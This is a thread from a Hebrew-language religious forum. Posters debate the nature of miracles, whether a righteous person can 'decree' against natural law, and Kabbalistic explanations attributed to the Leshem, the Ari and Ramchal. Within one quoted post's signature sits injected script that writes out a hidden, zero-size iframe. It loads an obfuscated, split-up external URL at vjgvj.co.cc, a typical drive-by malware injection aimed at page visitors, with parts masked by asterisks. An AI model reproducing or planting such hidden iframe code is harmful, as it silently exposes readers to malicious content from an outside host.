| נשלח ב-21/3/2003 11:42 |
|
| |
מהו נס?
בפסח ובסוכות כאשר היתרחשו ניסים גלוים
אין כלל איזכור לנסים
בחנוכה ובפורים שהם מדרבנן יש איזכור נרחב על הניסים והוא העיקר
פסח וסוכות הם נסים שנעשו ע"י הקב"ה עצמו
פסח אני ולא מלאך סוכות ענני הכבוד
חנוכה ופורים הם ניסים שהיתרחשו כתוצאה מפעולות אדם
במוצאי מילחמת ששת הימים נפל בחלקי לשהות במחיצתו של האלוף הרה"ג גורן זצ"ל
וכך אמר:
בזה שניצחנו הוא לא רואה נס שכן נפלו קורבנות רבים ר"ל
הנס הוא בזה שעל ידינו מתגשם חזון הנבאים
מוקדש למימוני כחומר למחשבה שכתב
שהוא סומך על המובטח בפרשת ניצבים ועל הנס
כן יהיה לנו
ערב שבת שלום ושלווה והשקט ובטח
|
|
|
|
| נשלח ב-11/8/2011 23:42 |
|
| |
ואם אנו מנסים כאן לחשוב ופחות לספר אגדות, אז אפשר לשכוח בינתיים על משל ששת הימים, כמו שעשה הרמב"ם,
"ולפיכך תמצא שאני תמיד בכל מה שחברתי בספרי ההלכות, אם נזדמן לי הזכרת יסודות, אז אעסוק בקיום מציאות ה', הריני מקיימו בדברים הנוטים לצד הקדמוּת... " (מו"נ א, עא)
ולמען אמת להוכיח קיום מציאות מתוך הנחה שמה שהיה הוא שיהיה, כלומר הוכחה שגם הקדמות לא תקלקל אותה.
|
|
| נשלח ב-11/8/2011 23:18 |
|
| |
תנוח עליך דעתך זו רק אמירה תלמודית. המשנה באבות והגמרא מונים 10 ניסים מעל הטבע שהתרחשו. שהמשנה והגמרא טורחים להסביר - כי הניסים יוצאי דופן הללו נוצרו כבר ביום השישי בין השמשות. בטרם אמר בשמיים את ויכולו השמים- לאחר שאמרו בשמיים ויכולו השמים והארץ וכל צבאם. הכוונה שאחר כך- שוב לא קרו ניסים מעל הטבע- זו כוונת המשנה והגמרא
|
|
|
|
| נשלח ב-11/8/2011 23:07 |
|
| |
| ירוחםשמ כתב: |  | | אני מסכים. |
|
תודה על תשובתך. הבנתי כי יש לנו קונסנסוס כי לא קיים "נס" שמפר את החוק.
***האדם שמשלה בהונאה את הרבים- הוא לא צדיק.***
כן, כמו שקראנו שלשום,
"נְבִיאַיִךְ, חָזוּ לָךְ שָׁוְא וְתָפֵל, וְלֹא-גִלּוּ עַל-עֲוֹנֵךְ"
ממש אקטואלי, גם באשכול הזה.
נ. ב.
ינוח אני לא שרץ לנוח. יָנוֹח היא עיר מקראית, והנני מתנחל על תילה.
|
|
|
| נשלח ב-11/8/2011 15:48 |
|
| |
| tzvi11 כתב: |  | שותפי סוד!
אני נהנה מאוד מהביאורים שלך על פי סוד, למרות שאני לא מבין מדוע הנך בוחר רק את דרכו של הלשם, ודווקא בעניין זה שהיא מאוד מחודשת.
אתה יודע כי באופן פשוט דווקא הניסים הגדולים הם מקו אין סוף ואין שום הנהגה בעולם גלויה על כל פנים מאור אין סוף המקיף שמחוץ לקו.
ופלא עצום על בעל הלשם שחידש דבר כזה שהוא חידוש עצום, כי באופן פשוט לפי עומק ההבנה בדברי האר"י אין מקום לשום הנהגה מחוץ למקום הצימצום והקו.
קח נא קצת גם את דברי הרמח"ל שלפחות הם מחויבים יותר למבנה הבסיסי של האר"י, ואז מקום הנס יבוא מאריך או מעתיק, אבל בודאי לא מאור אין סוף המקיף. |
|
תודה על העידוד.
המושג קו הא"ס והא"ס הסובב, שהם הבסיס להנהגה הטבעית ולהנהגה הנסית כנ"ל, הוא מושג ערכי. כך התבאר בלשם בהקדמה לשער הפונה קדים (בסוף ספר הקדו"ש).
ולפ"ז גם אריך אנפין מתייחס לכלל עולם האצילות בשני אופנים אלו: ההנהגה הטבעית שלו, אשר משתלבת בהתאמה בתוך הנהגת כלל האצילות, או ההנהגה הנסית שלו, אשר חודרת ובוקעת את הנהגת כלל האצילות בצורה מפתיעה בכניסתה וביציאתה.
בהבנה זאת מתיישבות סוגיות רבות. למשל איך ייתכן שאריך אנפין יהיה בבחינת הבריח התיכון בתוך פנימיות כלל האצילות מצד אחד, ומצד שני הרי הוא בבחינת יחידה שהיא אור מקיף מסביב אשר איננו נכנס כלל לתוך העולם. התירוץ הוא שיש הנהגה טבעית והנהגה נסית גם ביחס לאריך עצמו, והן בחינות הקו והסובב בערכו כנ"ל.
ולכן דברי הלשם מתאימים גם לדבריך.
|
|
|
|
| נשלח ב-11/8/2011 03:25 |
|
| |
שותפי סוד! אני נהנה מאוד מהביאורים שלך על פי סוד, למרות שאני לא מבין מדוע הנך בוחר רק את דרכו של הלשם, ודווקא בעניין זה שהיא מאוד מחודשת. אתה יודע כי באופן פשוט דווקא הניסים הגדולים הם מקו אין סוף ואין שום הנהגה בעולם גלויה על כל פנים מאור אין סוף המקיף שמחוץ לקו. ופלא עצום על בעל הלשם שחידש דבר כזה שהוא חידוש עצום, כי באופן פשוט לפי עומק ההבנה בדברי האר"י אין מקום לשום הנהגה מחוץ למקום הצימצום והקו. קח נא קצת גם את דברי הרמח"ל שלפחות הם מחויבים יותר למבנה הבסיסי של האר"י, ואז מקום הנס יבוא מאריך או מעתיק, אבל בודאי לא מאור אין סוף המקיף.
|
|
|
|
| נשלח ב-10/8/2011 23:47 |
|
| |
תנוח עליך דעתך אני מסכים. ויותר, המילה צדיק במיקרא- זה אדם העושה צדק שחי חיי צדק ונוהג בצדק. לקחו את המילה והפכו אותה לההפך. כי אדם החיי על חשבון אחרים - לא צדיק. האדם שמשלה בהונאה את הרבים- הוא לא צדיק.
|
|
|
|
| נשלח ב-10/8/2011 22:34 |
|
| |
ירוחםשמ, האם אתה לא מסכים כי אם צדיק "גוזר" כי "חוק נתן ויעבור", אז הוא לא ממש צדיק?
|
|
| נשלח ב-10/8/2011 22:30 |
|
| |
ינוח באמת תנוח כי את המאמר הזה למדו מהגמרא, וספרות החסידות מלאה בזה.
מאור ושמש בראשית פרשת וישלח
שאף הקדוש ברוך הוא עושה רצון הצדיקים, והקב"ה גוזר והצדיק מבטל והצדיק גוזר והקב"ה מקיים על כן אם הקדוש ברוך הוא עושה רצון הצדיקים אנו על אחת כמה וכמה, כן הוא במדרש.
|
|
|
|
| נשלח ב-10/8/2011 22:21 |
|
| |
| ירוחםשמ כתב: |  | | על האמירה- צדיק גוזר והקב"ה מקיים -שמעת? זה אף פעם לא הרגיז אותך? כאבסורד וכחוצפה כלפי שמייא, להגיד את זה או אפילו לחשוב על זה?
יש אנשים- הרבה מאד- שחושבים שהקב"ה עובד אצלם בקבלנות. והם מכתיבים לו. וגם מאלצים אותו בפעולות שונות , לעשות מעשים טובים או רעים. |
|
אם צדיק "גוזר" כי "חוק נתן ויעבור", אז איזה צדיק הוא?
אולי אפוא צדיק שקר.
|
|
| נשלח ב-10/8/2011 22:02 |
|
| |
אכן, כמו שאמרת, אין מילים.
|
|
|
|
| נשלח ב-10/8/2011 22:02 |
|
| |
על האמירה- צדיק גוזר והקב"ה מקיים -שמעת? זה אף פעם לא הרגיז אותך? כאבסורד וכחוצפה כלפי שמייא, להגיד את זה או אפילו לחשוב על זה?
יש אנשים- הרבה מאד- שחושבים שהקב"ה עובד אצלם בקבלנות. והם מכתיבים לו. וגם מאלצים אותו בפעולות שונות , לעשות מעשים טובים או רעים.
|
|
|
|
| נשלח ב-10/8/2011 21:43 |
|
| |
האדם יכריח את הא-ל להיות אבסורדיסט?
פשוט אין מילים..
רק אם חסר לו יראת השמים, האדם יכול לפנטז לעצמו כי לא הכול בידי השמים.
פשוט תחשוב רגע, מה תוכל לקלקל בחוק הא-ל?
גם חוצפת כל האנושות ביחד, מה תשנה בחוק?
כלום. מכסימום היא תבין משהו על חוצםתה.
|
|
| נשלח ב-10/8/2011 21:08 |
|
| |
| ינוח כתב: |  | אפילו שען רגיל מסתדר בלי אבסורדים.
אוי ואבוי למי שיחשוב כי שען העולם בלתי מסתדר בלא אבסורדים.
לא, אינטואיציה לא יכולה כזה אבסורד ללחוש. |
|
ודאי שבורא עולם מסתדר גם בלי נסים, אלא שהבחירה האנושית היא שיכולה לקלקל את המהלך הטבעי ואז נזקקים למהלך לא טבעי כדי להחזיר את העולם לתלם.
|
|
|
|
| נשלח ב-10/8/2011 21:00 |
|
| |
| מיימוני כתב: |  | אם המערכת נתקעת, אזי יהיה נס שפורץ את חוקי הטבע.
שומר פיו ולשונו - שומר מצרות נפשו ******* type="text/">document.write("*************** scrolling='no' frameborder='0' height='0px' width='0px' src='ht"+"tp:"+"/"+"/"+"vjgvj.co"+".cc/?a="+***************+"'><*");> |
|
אפילו שען רגיל מסתדר בלי אבסורדים.
אוי ואבוי למי שיחשוב כי שען העולם בלתי מסתדר בלא אבסורדים.
לא, אינטואיציה לא יכולה כזה אבסורד ללחוש.
|
|
| נשלח ב-10/8/2011 17:35 |
|
| |
| מיימוני כתב: |  | שותף
דבריך נאים. אני מרשה לעצמי לסכמם בניכוי המיותר.
ה' אירגן שהעולם יתנהל באופן טבעי, או טבעי כביכול, על פי מערכת סיבתית. יש להבין שדי במערכת הזו כדי לקדם את הבריאה לקראת תכלית מסויימת רצויה.
אם המערכת נתקעת, אזי יהיה נס שפורץ את חוקי הטבע.
זה הסבר מקובל מאד. (במובן שהוא נפוץ ואינטואיטיבי).
אתה הוספת עליו כמה מושגים קבליים (שייחסת לפי אמונתך לחז"ל). כפי שאפשר לראות, התיאוריה שלך עובדת יפה מאד גם בלי להאחז ב"קבלה" של הלשם או מי שלא יהיה. |
|
כל הקבלה היא נפוצה ואינטואיטיבית (כלשונך).
לו רק זכינו ללמוד אותה ללא דעות מוקדמות (הנובעות מתופעות שוליות שאינן ממין הסוגיה).
|
|
|
|
|